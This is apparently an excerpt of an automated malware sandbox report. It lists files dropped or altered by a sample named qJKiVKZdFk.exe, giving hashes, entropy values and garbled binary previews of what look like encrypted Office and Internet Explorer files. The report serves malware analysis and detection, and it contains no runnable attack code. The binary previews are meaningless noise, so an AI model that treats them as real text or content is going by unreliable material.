                                                                                                                                      Preview:<?xml-'...a.b..8.....H...QT9.[....)."j..1.7..,~....7M.}k..t...nI.&$}W.D.R..[VRV%$.Y..~..V._u.E.J...+...J.J...L4$......F[.%6.....D.......}G.?..M&. ......P}B...f...........C...)2..a...ROu.].x.B..at!.7..r.7.3W9I.....(V.j]...T._...8N..Z.A.8..T..'.U..jA./..e.....e..<..)9h..."..nf.6V.}.......".....nl.<.n........|.F....D.E.....`.......[;Q.hH.................;......^L.S(.i]. ..[....d..0j.&.. .>0Yo.1...78i.m.VHD2..T.6..O....6[.P..{4...V....8H..=..Xb`.>NZ1...@sS.y....ru4..c..d.tP..<.).\.n.M.G...2.()..,i...]...Ee..>%M...QE..b(..y......U%V....7c.1>.. B2..b ;.*..2.M*...........u.s.....)...W.....d.wU5.X...&c.}._....->p...@..e>.w.X......\......L|3.-JQ......J?.K.......y....)HF.X4#........Y0.@.|..~..s&....LU(-i..|(a......<..J5.J......s.ta.._..q.1..v...*.1..R.o..8..)..'..=.*f...3..&..[.....<3....h'u...Y..?.%...q.a%.....%V...8....:.a.=....s.....p..0....+.+E.}....i{..8U.W..>|./.V~..i..?..~p{..I.).qr...!..<\.%..D".. ..h6q..9Zn*.9QK..~.`...:..P.[&.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):6910
                                                                                                                                      Entropy (8bit):7.974542951749912
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:Onn3iHfA/bw4pT+ClBAHiNxZWVNXoH0+rbYNMLODhvVs6px2UVvAKmW5rfUL2AS:43iHfT4UTCR6CpY2yVJmKmW5BAS
                                                                                                                                      MD5:1A1F6F00A999A84D6F59325D01F1B8AC
                                                                                                                                      SHA1:9574A6FA9B34891A2D36A2935DCA07DBF4C39EC9
                                                                                                                                      SHA-256:77F9A6A559A1B220FC709BF6CBA71104E3C705F21615BE59FDEE5AA4FAF275F9
                                                                                                                                      SHA-512:B2C38F4A752D69C47E64459A361C2E81D83334B289FA1F49660A9FE75CFEDE52AB36E403CE7B570E90F4888F3E0D015A3A4E99A39520FFD12FF9EB39ACAB7897
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:10/05...#..r.Fwh...R.4..Yanq.....,.qr....n.}^.#Pj.'7)...V....75h.n...k.7W.z..y.kr..../.y.>.v..G.H.....N.....[........"...}......*5..3.....2..c.?.r.._...N .:.7b.......S~L..<..tQoi.7.z.....9.....)...^S.P.'....H..0..F.....I.d.;....yI.Md...v.u.*..y e...j..<.).fd..2cT..&y...P..6o..g....A....t... .....D....`......}>................U.6...Vk&)../.3Q..5:H..I.x...s$.q&V.rP..q.......].L../.Ms...u.>-..j.*/...t.H=..P......Mn..8..T..B3.G.p.P..CY...7y"...p=.<.\..]...k=x.'/.r.^. ..M...l].^.h..C.Q...h~V..E.&g.....Y..7a.w.3,..'...V..H..K.PZ.M?.V?^b.....a..Z.S.]....B.IK..n.0..T.....9.....D 6!.M.C.. M..n.K..4........._...fv.2...AO..;.)$.f...{Jc.LD.{..I5W1./.J..)~1..._.n..h..:Tb{e.?gY'9..7px...*.k.8......]I.z../{...nFLp.....l0M.Z..............+..S.V..kHfh..N..5...>s...)...uBU.....a:.....WD.*.N.l.....'.NP...]}.....1....:...(......C.c.W+....80r.4..x.i.C.......,.....Z...a.Z.Q..*..bG...H.*.S...W{.i(.......Kl....6I.?.1NP......WF..w?.....Xf{..rT..Z...o.....

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (416), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):834
                                                                                                                                      Entropy (8bit):7.777722038329751
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:QI6EkprEz8sWAhQSFULBHNkKq9+NWh2eKAObD:fjWyQSFULBHNkKq9+NWhRhsD
                                                                                                                                      MD5:7AC41F6427EF61D876A673A28E315093
                                                                                                                                      SHA1:E16ACAEA283F6D6D15404F562C367359AE672CCB
                                                                                                                                      SHA-256:C2B812FF22F34B7D5EF37E8059863F3515B7DD0EB9A2794F3F4DB16308D0B64E
                                                                                                                                      SHA-512:5B290E4B864516A76F9FBE82D795E2FA509CE2CC096D1F08CDDEBED0530257927A95F4698671037B14C104C3756A61C1D81B4EFC9B2E8B78F7B67184B528D387
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:..1.0./2..9....p...}P...f....4Vg.*1...K.\G..9S.>...s....s..l.Q..3.40M@jz.ph@.\!..aN)w..*z..........m..,Ep;.o.e.8]..QHz...5. ...h.LX.28b<..F.........$t....Y..+..c..f....)..5.h............={..I=P.T..r..u0....v.Y.......E.,g..D...oz..._<s....k.K.a..g".c/....X..F...g..@C..WQG..A...Yd\8m.1.i)..P.Uea>....bP.@+G.'{...L$...Id......yW9......2&.Mz..nm.^..m.....tB..2.sP...d^p..y.r.............V.d.H.4d ...;...C.[.z.z..t.......Q..+..,.......R...R..QCIcx..rzf.G.o.rnsu.(.......IwE^...!.$.g..:..e...S..L(J%.{....e.E.......0...l.....q..s..v;.....6...8K..._....S;.ad.]B.Q:52..^]L.ZbV`<#?.k7.wc..|"..W..G.el.....0/.~Lz<['n........g....PH."...9_........\M\v.L}...6...._7D).......O.b.A...q..C...J.........4S.x...G...iHc..]....j/.y...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-UserConfig.log

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1742
                                                                                                                                      Entropy (8bit):7.874823870955222
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:qD8Fo22aRUVGPNuxx8XimE+0GnYJy2nN/2n5oD:qD8FWCUVG8+i3+Roy2Nk50
                                                                                                                                      MD5:E03293CC1404AC9999CBAE43507A790B
                                                                                                                                      SHA1:1F651FD451FD7B55F747CEFF3DFD8F7FBECBFBD0
                                                                                                                                      SHA-256:0FC4791F7E4C4A7FF14DEE745801019E38DC1972A6F63550D35F5B3D9627CD9B
                                                                                                                                      SHA-512:F82523E34E68617CCC11028E539ACA9525BFE5BF62B660A00B2DCC9539451F8C370DC2ED0823ABB69809856CD39A0602E02F4E8E475BBBBB5505E5A0B27E0A44
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:..1.0...L9.%e~K-Z..r..)c..&...r..6$....o.<..m..Fz...\0.P.cv0j.=..90.a....=....TmM..\nC..*.....WV..Q..+;.....#.........{(.5.}0.:...o..... ....r.)....I.S..;.q0kC.<w.T.3lvf....7.....q......&$.......[z....a...)7~.4.".L....|...cn....... \.....>1..O?;...=..........3..;jx}.N...q.|..[./.q{f.J.4...'h....a...&4.=.9....P..x.>%=..'y4[....X+....a7>...../)X..:..T .h...De5..YqF\`.3dU70.....odUb.|.....aO#&.....C.*4..........!.J....y..&T.p.^{.k..].....E...-./..Cf...f......1.YB<d...1XD....'...Br.0..p.TN[..$7.ws.(...kY..T..-./.....$.q..nF..;*T.#..:.>...}..s~<S.M...[.$.{...`P...p.{.7.%Ho..8..1..m.w.....G8P.=a........yB.@.(T....K.....{..G....tj.I....wX*../xI..?...4...%R..CL..mZjE.C.k.31n.|.....g$.....{L..?k..#.4...~......[.j....V. .._.qa.8... I......'.z.h.V(r.mWDh,.M..-..^._.JZ>...........@.nM.......K.NK......A%.....S...z..0L.._....A..D.4..,N....\...j..5.6...r.F..../.B.....!&;.1+D1.Hz..P.VI.G.T...2xb.....%N..}.>.O...>7..s\.........}..E.a......v}G.f B...(.ybH...

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1062891
                                                                                                                                      Entropy (8bit):5.5300860146170905
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:qlg4WQ1+S6aK3XSZlV0N8x5thr291gess3TylunXR:uW2V6aKz
                                                                                                                                      MD5:C66A888CC72AD53E430960F4F7A814C5
                                                                                                                                      SHA1:23370748A48A66CF7BB0CAD646A2CECBCFA35AF5
                                                                                                                                      SHA-256:991C5217C871DD9A8B022F9A0DB046110A6D15223CB3F0E9CDCD751B7A259D94
                                                                                                                                      SHA-512:C9719813BEBE9516D1150BA2FA876E82E646F09F9C9F30F225D22E4C3514D9B5C9D5FCE885811BA78C6C15578E34429F39B8B0F608EF7C7AF997B5DE98DC3065
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<Rule.C.=.Hx....U._....[(.........s..... a..}.L...$g............Pv.UF.x.....>?.s..."...=.....L.5j...._.|H..f.8..R.t.-2.Y.58..t.<.wv.].(.a\.....\ ..E...... .,.....wJ.W...z.;..M)".K.Cd..b(.2.|.D._...H.._.C.U.9.oB$.%...-...Kd.....-..J.C`.~M..#j.T.k........{......sA.Z...y......~G.Yi..o:....y<,.M.Q.............L.:aU.B........E....|.".k............Ykp..]l..$./87...qb.!.....K..[.g..".|f..RC.b.l........b.t.p.P....8B.Ae..A.L8....-*H...L..pJ.Vt!v .7.Q...}....r....A..U.5z.......t&....W..&....-}_...@$d4......A..H.Iv.S....b..........[..xh.@.......F...KQ.Wpw..$....m.&.}..-...h6..f....(..}]...N...)..{Iu.D.......1]?....(...M..}.3!.....z....7..l.kx...^..c5.BT..!yx.A.w`.0..b..'...5.}]!b.4..{iZ...12..V. ^n~....-..B($..P5...X...<.rA*b%a...F(..mN.I%.9l.. ..]4wj...r.h.:.1>y...&.}F.m...z.RO/=....f..#;.@....i{..6.*.g..+.<..TfU..$Z9<.7.yT.Z.._#\..(.>(U...1...\+75x..HP/...#......<..............r.....70.....K.#f...3:i..w.N....)QN..@..p#......q.T......

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170000v6.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):851
                                                                                                                                      Entropy (8bit):7.748764364891704
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:994BQEfXMpPYAkW7r3fSX3AmQrzGmDDyuTbD:994BQOIvkw3feAnPByuHD
                                                                                                                                      MD5:C8B50F6A9FD6C027E53DC585070638FD
                                                                                                                                      SHA1:3E198AB1C27AEB2E036EF3A13C18CF85AB2F1CA9
                                                                                                                                      SHA-256:78916F4F4EFC908D290C5C24BA6F5F49FCEC234FCADF70D9542A228BE007B34C
                                                                                                                                      SHA-512:C1EF43883D0F99052FDAE2CCB4FBF2AA4F76042C10E1B51928165D115B74B06852FEAB86FF0027EB24E289E95877AEEAF3D6580C691E940F52A1C91E9ADE25E2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlw....&n/o..s-..|.W&H.&.#..$...Q..........*..{.\...2Y.c....s..;...x.x<..`dAI*..|.3l....:i...[8..=c.}:i5.K..O.`.v.qPq..".e.\.$+5..V...G.9&.u].p.x..b....|).4M.@W{..%l.\..h._mgS.....^..[....Q.}.e.(..>........}..l^.!.s8.....\...U0.8..jVk.R.J......c"#'.o...I.|.[..Y..80...l....|.pV.!.8....F.8.*...)..r,z/u.P..y......s...f.t4]..rq.l..>..y...p_...c&.{cl.A......H.....9.P....A...\....L.zP.j.U..X...!.FD.V.....\`!.s.....N....,~..$K~:.-...sn.$L[.Vj.\.G.&.o.O...Q?.Q.7...d...J./...."...}..dG...._N..@.....^...:..8..L..HU9.JE..$.!<..cO.}.lnM.Q...sF....Y.........m....s..u..~./).DO.L1.)..bfkN....d..(.....~.{L....Ms.........ok.K.Q.....'S..r.NW=.cV%qu .9............&...TV`W.#.V.....k.t..g....N3.......i.&......E{.c...*/.....::.7...o.....zk.u..n.Htp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170002v6.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):6314
                                                                                                                                      Entropy (8bit):7.9700526313601205
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:abDWDsnBm22aaHi30X3KL5Qrp3MFtIIgqFbZkG:DDsNX30KtQFgtIKZZp
                                                                                                                                      MD5:213CD0FC57ADEB6F86CCB58B8C4542F7
                                                                                                                                      SHA1:BC2E5F867633B744D901919D09B73D4FD3135FAF
                                                                                                                                      SHA-256:0C468667DBC34459DE980E51296D1BF93252189B9D37AC5307E429D71D756CEA
                                                                                                                                      SHA-512:1678BA161E8F66C6110E15FD8FBADEEDF6BAEE1996E7FA7B10663839688CC599B3CDCF76C2B57403AC9361C8CDE2C5BBBE61AFC542DB42DE25655E0046172D02
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.....$....V.l.....w.b`*..Y.E...!.Z......s.fE..i...u...)..o.&..f.d.<.u..)..QazU......P..a&..?.....|*.h.A.!.T.....Q.iA......v..<.b..,...b.z..'MIY2..3..|..q..[.O.\.2......dE Tu.(.J....M.... P....#B.E.v....$.F.\....F1...R..yQ.......<.cN:....Y.".P.E.T.3....!l`s..OF.@3.....Y2...y9j.B.25/'K..3OZ1f9s|1KRpA.0._.U..8.R.i...)....$zN(5[\8'..~....X..(....~..9....}.A..P...I.... Y....i..hG.V......Br..?..."y..X..2.j.6.}@..".3..r........?n........Y...Xd$(.%.i.......h.-..5&.=.I'w........./........\....>...V.S.bF... .|._..<..A........'.5....~=;\V.d.h|,.>...b...=".kT.H....-W.y.].,@.1>f...d.....)..WY..&3a.W.q.x...0..N....O.a\.B1.{...'.......(_.:.......P.....}E.4..A...RW@h`.0Uw...r=.AL.....X.}0<G...3....6..E..n..^.*..-.$)2.Pv.t..L..9E.NJ;.@.4..XNq...b.[.oi.......[.D@.....O.e...:...A.q......;..@c..lz....."...D..1cxV..?,7VA.p.#..._.....h...`..5..n...J'pi...:......_.).(..k..D`xj.......j..W.\...s<...&bjL&...>#{........]pa.Z/87..U..b5.....*.m....,.c]a^

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170003v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1029
                                                                                                                                      Entropy (8bit):7.795775097741502
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:qUSvTx58Wvp+DOeA6U4dd6fW184cIDbDKEJwovJfMbD:qrLxGWw6oHdd+I7wMGD
                                                                                                                                      MD5:50DA89F754C4B4E51ABD94E5167D781F
                                                                                                                                      SHA1:216FE30B3026CCED7D9127EA1278B6FB7E9F1504
                                                                                                                                      SHA-256:1B5FBFF6FDB43D83732B0C0D892E531C2C3EE8B27462853BDFE6FEAC4D56B9D4
                                                                                                                                      SHA-512:E48E892EC896F99C2067A7AF6A9EBFC3E0E2D42543B903BE533E14BBD18A79E7279D6B2B355C7627241E5CE6F05A179375370F1BD4B66062CD6B55A16FF579C6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...........6Y.h.Vd..%Q.m.d.M..b....`..^.L^.v.rd....$SA.....!..{.c@.....3...G#^$.kIy..W....S.;...6........'.`....R5.....KJ..5.+&..<.G..bdL@....8)K".N.F.WM...(._....zA:.u/..d ..|E.]."..G.4._q...+.5_..Wr..8;..N.W...,L/.L.q'..D..Y..j...Y.#).2..'x=V.D..o.D_.)?..b......V..2.t.;..O..?....%O.X.9...-.....z7._..G..U*.nc.......MHJ.r...Fm.]..:...sI....*he.eY.Y.Z?...oG.B..B..;)..ud...<T.C..g..1.....?.....*..."wy...k..A.~.P.m.U.2"yg....9....1t....z8.......2,.s..i.f....z.......N.9Zg.n....A.9_......i.&....m..JsS`A<_....d..=...<b._ ..4s ..%.9..*.... G.\.. VR.....7...6..f..FJ..J.".......e_...^.j.....C...5.*.8.....Y...8.}O.g.B..2a.j.U..RD..I. G...]o.~vO.....7.B.L..8..t.R.Q.).. #<4i>.[.bg.a+..Uc..tNRU..Ip...x...a+..w....#..;Nv.0...33.L^.]Z.6Yq.k.d.4.\.....+........1c.^v...5..3...O.p.AZ..[.....:>L0..M>0....F...].r.+W..b....k...;I...:\l...`.}..#EK....P.Q..8?. e.YG5.k.!BV..YxD.+"5.k..i...4.`....?tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170005v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1040
                                                                                                                                      Entropy (8bit):7.77552719110674
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:QotV1zTL4o8wKjev0+BUxQf7T/Wd35xTNPPiPArleFbD:Qy1zTsAlkkzW5TNPWD
                                                                                                                                      MD5:BD2D4DE34AC31AAFE68214C496C15D32
                                                                                                                                      SHA1:D10B6B11359E0B1B27097352405E945681E94D9A
                                                                                                                                      SHA-256:1335387A652BE5154188BDC58B8CC8EC5949E0426F0FEE4BF597E88A34EAFB64
                                                                                                                                      SHA-512:9B3613470FBFD16D2F64EF7175A59F882482D65ADBFDAEF967ADC3C4FBBA4FD0DA7A31C94CACC44F1B25FDD5E953BC30AB94C667A7949CC530CD7B107741B49E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmll[f....".(..H.#..^% .Ei+0...N........b.s..,w.{..3../.<...-.]DW2Gk~vJ...[e..s.%..Ch.[,!.gF.w.p...J.E.....b...f$.y+.d.Z.b..D:.x..#...9..Bq.S.L_).Y........d.b.@..-...b#"<r.....I....8.=.$.G....!+.. (..P.m8.(7G.<9y..@/.G.P..;.K.7..u..eV..W.[.@^Ys...A....09.&.m2.....%...4.P. .b..>....E......'.<..Y..;h.......C...j....M.W.o..M..{f..e.f.4..$..... .J......c...W.4..!.!s .-..U.......EJ.])..e.;..y......q.2!..ylJ./j...[...._{......mh 3#4.u!..[.N....>.N.=...vw...V.......4m.1....B...r.q.".+.{W,.....7.A..w...M.S.....>...S......Q.)`#.N..c...~........~....P..+|.U]....b!9..}d.z.O....f..9=D..F..#..6d..V.-4.....wC\t.\...d........L.%..!....r.J.W..o..w1V........uM.gxX.+..#\Y.....M.N..g.M+.b.>}l.Y.3....V/..m.8^.!.ug.A.>..\...1.:....M0u.^o|......=.....S.q.|J...7&.|,5.....3&+6.....K.D%rA~.M.V...t"!.\'.=&..cH......i.p!y.I......p@.e...wF*......F.D}..6.Y.'....X5^....c8Z.N...!0?.pHi.9B...L..=...&..x..E.Pi..m.t=<C.".@.........$."S%.A.qkY8..Ptp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJ

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170007v5.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1415
                                                                                                                                      Entropy (8bit):7.843501212662512
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:lZWEESXeXDo3drH0y12kCukrdDoAnaENgcdizNQp5eAcHHGHfFurGxHiVpKPbD:lZWEESX0oNGSadDoCPNgcdSQ/eAcHm/B
                                                                                                                                      MD5:5288CCAAC191EC12C080A0B84AA56F05
                                                                                                                                      SHA1:11A330A0D38DA6623200BFF0304AD218EF0222DB
                                                                                                                                      SHA-256:85D0AF13B4E28A0606B98F89521202C878E1FE1871E8230479C92A9D3343A751
                                                                                                                                      SHA-512:559B9B743D6D828E02717EC5AC86267ED5E73D4EB677F50BED778A9528EA78E177D08DFDFFD552F52BEBA13F313FA57A036EBE66220AB55CF8330E56ABA1F560
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml....v9e.Y.^...<....tTLO6.d._U...Mu...>....{U..0.W..e..6..e..-.i@..N.-.P.".z...o....Hs...<..h..Mu..>3eF+.a(..S.x..2 ...N..D...0YP.--._.-U/S.1g..j..3E......]..@.1..(p!...4ib.i.x...r....:1\.W.1.y.G..$d...Cp...9P.%P.F.q....=j....<M..T3jK........6........F.2.kH... G..7+.Y\G..Q..m.H..a...i.{.V..{.v%..$F.| #4.r.$....A.o......'......=..aa..;<<..#u.p....x.iC..Nn.3?.c..H8..^..f..`9X...x8.e.^r...fQO.t....pJ.{D.5..cH.4C*.^...S.#..-....,#.S.x.G.."P}.i.........J4:J..).Ts.N...d..mC.G...G...N1....~r.... _?...OUlz5n.x.K......v(B...W...l.k .k...<.....Qy..v...I]d.`.p+2)t..P.+..dB5`..g.l.k.^.....L.2....y}%l_....iq.)..n...9.1..1....6.2)\..4..fW6.L._...c.(...u.b...M....H.... ....9.a.l.......[4rm...e...5..?..|..x.......*./.!F.5J...c.e..g..4N@..G.y....p.<.r..k.....m!0....C....}.{v.Z.>......7?..j...e..$.f..P....!.i..'.6mOe........^.z..C.5.e=.,.f..I.=.'.n....B.....%..D...f.E.6.D..A.f%P.oPW.}...4.a-..].+...../..Zv../.?%k.HV.1<....}.u...z ....&%6"..$.ih..J@.=

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170009v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1073
                                                                                                                                      Entropy (8bit):7.828893376208648
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:mmPHysST4c/gq6aQ7lbeer90HnFdwMZWRdjommW5ZbD:mmvc4c3Q5dgdDZWRdjo5eZD
                                                                                                                                      MD5:CB57398DBECC8865FE4368538B0FB9E2
                                                                                                                                      SHA1:EDB9BB27D3BF326C84DA25F40F7893DCC7CF27F8
                                                                                                                                      SHA-256:BA68D6FEBB2CE3AE9F7996B0207CD7020AB4890B63F583BABE2E770D6191F5A9
                                                                                                                                      SHA-512:FFD69ED216E19F1F7332050B125F3B7527ADA0F836DA108E3BF2D5ADACA19BE6ACE6C499382F30D7D80E2E81342EE6F890A6F2C5CB0D32B7DFBD680C91CCBC08
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...P.?.hB.g.:KN.O..S..T@...G..... G.n3.j.&...+y.........Az...Z..*..(...h:....Q..A<^m+..#F.#6e..;".`c.l.B...... ..$/.H`.9LT..L......>u.V.;H..L....K.Y.m... .8.|}.n..,.j/.D..+c#.<H.v..r..n...;t....]U.t...(kp.x..&>Y.~.$...U.2......p...{..U[.J|........S....?..xF....,1p.t.n.........rU......%.V./..e...U,...."[.l.P=......}.9......fN6.P.*....O....{.....T<.i"r.B.....+..[,..........7.%o.&.s..|...L.':^i....a.F..W.`.c..A......&.|..y.hE.z...)F.[4p.P..L..p.Y<E.\.3!.c...o{.....m|H.....J'q.yj~._..X.........k..z..+*..X.T..h.5.(......<.m..L.l.....+ ..Lx..C..E......v..{....$\....|.J......Q...^.*......G.'k.F;..S...b?!...p....-y..%........R....K.L.......g.5*.u=.......ZG..j..&../ZW.-...%.......`..2e.j...k..'.8...~rm..|nB..>.y~@...n.Z.....r.;<(].F.X.0..J.S%...24.fT.U.+.....sMR...F.sg}....%..q..o...v.K....:s\.;RC....7....?.u...M.`..#....Z..l.G.!}.P,.iR>./.X....T\....A.....o..S..=N.x^V....+t...#/,..%.jMw]......+...M..p.%<)6.......V...........F.....Vtp8qj

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170011v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1154
                                                                                                                                      Entropy (8bit):7.831260351540454
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:1wwq5teuGwEmKHq0F+Cnn/NkVBFt9bYSs9HuNyDQljJwsbD:iHDFGNmKHtH1kTFtlYS2O8DQp5D
                                                                                                                                      MD5:4AB71408604D3A588A835A9A4A2C5152
                                                                                                                                      SHA1:5FA2D920ACC317CC28ACE0DF0B8FE96CC0B50F5F
                                                                                                                                      SHA-256:0EBB5078B031C3303DE20F523693B3C79199E82ACC52C08D61B0AF97EBE4624F
                                                                                                                                      SHA-512:F15CA0A793FF130D4818D1E1F5C5603D2BC2F393ED8482FAFDEF9D58F2E2D46DC889FC855B12D8A2FE188D214E6DB0A9900BC929AD96D5E08E1663966BE558CC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..[Z..c.J....XN.a.+k...R...yT....yr..k.u...]...6...d......w....B....;.w..19.u.0d/.g....Mjjq,.Y...s..eKf.ig....M_...]T..-...T...'.].-..}^.._..^..p.....6v....d..u.cA.whO...Q.........P.....|QI.....w..t.J....-..y.d..m..Q.`.iI7./..h.|#..SH.\..........y........p.kc.......SO....`...Z3C.........&.%...VD...-q...B6...i.....e.:...?....^:....2.I..}.c.l..B..M..-..z....! .......|.FY#....J....2."...;..G....".(E..8....!.vsa..z....3$.w...v...K.-Sp....k..3..../y..A1Z.<...... s...^i..(...P..Z./..#..........C.l3.e...P..%g..z...\...=...1X...N.~>3i.9$..Gt.W.Bbb.u..'K....5c.l=.....s.F.d..!"Gq..UC.2j.......I.387..+..{.sq.nZ..6.?....@.k...1L.&.......&.7..1M.._%..iZ..M..g...p.6w..f.D.3h..\..../..-.rM..YqAw3q..t."#.DH..||L..w=....U.....ws....6..F.E.3.....r.-p.R.o,......T|........8+{..../ ...}......%..|..^.f.......Z.'._...=...%.ws.C.....!.G..ii..Y.z..7O6...W........hCs8....v........m7...wg\r.g..>.U;..i.yk.{...........u....y&bL..U.G..8.x.8^..1......T.}L.-n

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170012v8.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1902
                                                                                                                                      Entropy (8bit):7.876523573053341
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:xuvtmuYRweSMHNd0VGOGg6P7gPnZqcszD:xkaweSMtdmhNs7gPnlsf
                                                                                                                                      MD5:78048328CFD837F3434A529862F52089
                                                                                                                                      SHA1:5E42F48606972ABD068861333E0541BABADBF069
                                                                                                                                      SHA-256:F2E074F7BBCB9F6F82599B539DF62D29C6AF37748416872AA60C1426D1970D58
                                                                                                                                      SHA-512:020A42652D21161FF031E7A3FB0B99009A3D7F5866FD9C76AE70D6BBDEFC4CCEB290B2242DA7A77251524ABAD9CA404982E72EC357279D52F4EB0276AA1AAEB1
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..W......M.........B.p*.....M:;........-...T.w2u......1.sk.1..yy...c....\.X.." j...C.R]. ....Q>.....b.. ....4..=\..p...&S.......;s..........d./{..m.9.0...].0).`!\.C1Cd..G..m?*.g..kq.D...L...-%.<..s........O..|K.(".Z.a.*f......^@......%p.{E.t!>.Zb.#..]".(r.L......S<az..F..^=.e".\.d.i...j.J.I.w.^..<.o..q.;ZN.j.XU.}..7o:N..F@..+...........@C....C....,...f.{l..?....>.?<q...r.ME.gCO..I..u.......+.I...1-.k?.R...<B..U........."..s..n...pN|.|.X3..0......e..?.e....D......J.o.......~....1.... .^.C..\.d.~X._..K...z....$.......HG.....OG.Bl......h.....x.Y...D...*B..6>.4..(.]...T.|...'..8..=........5....\....Q.BLj.+w..x.P.<...]m.]Ru.}}.w..0..~...|1\!_w.S......B...H.yp..Rm..Q..d6.n...D<..~.tDPE.....;.b..<.T....m8..F..9.......?...@%G.Z(.I.@}...................:v.<#..$..Du.$.>.l.p.C......]K)..F.<u.../.p.]Ydh.j.w7.!...^.x..+]..j.m.f."f<....l.?..k.6.?2...~m.3.nwS.5.16n..f.O......9x.BM.U...]...vi>z...O.....p....]46....|..8<.k.kl....Y.)..tB.......v....

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170013v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):712
                                                                                                                                      Entropy (8bit):7.65629362546418
                                                                                                                                      Encrypted:false
